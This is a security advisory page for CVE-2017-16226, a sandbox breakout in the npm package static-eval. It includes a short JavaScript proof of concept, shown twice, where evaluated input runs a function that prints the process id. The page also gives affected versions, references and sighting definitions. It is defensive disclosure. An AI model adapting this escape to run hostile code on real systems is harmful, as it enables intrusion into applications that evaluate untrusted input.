GHSA-5MJW-6JRH-HVFQ
Vulnerability from github – Published: 2018-08-06 21:37 – Updated: 2023-09-11 16:18
VLAI?
Summary
Sandbox Breakout / Arbitrary Code Execution in static-eval
Details
Affected versions of static-eval pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
Proof of concept
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id
Recommendation
Update to version 2.0.0 or later.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "static-eval"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-16226"
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:16:46Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "Affected versions of `static-eval` pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.\n\n## Proof of concept\n```js\nvar evaluate = require(\u0027static-eval\u0027);\nvar parse = require(\u0027esprima\u0027).parse;\nvar src = \u0027(function(){console.log(process.pid)})()\u0027;\nvar ast = parse(src).body[0].expression;\nvar res = evaluate(ast, {});\n// Will print the process id\n```\n\n\n## Recommendation\n\nUpdate to version 2.0.0 or later.",
"id": "GHSA-5mjw-6jrh-hvfq",
"modified": "2023-09-11T16:18:58Z",
"published": "2018-08-06T21:37:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16226"
},
{
"type": "WEB",
"url": "https://github.com/substack/static-eval/pull/18"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-5mjw-6jrh-hvfq"
},
{
"type": "WEB",
"url": "https://maustin.net/articles/2017-10/static_eval"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/548"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Sandbox Breakout / Arbitrary Code Execution in static-eval"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…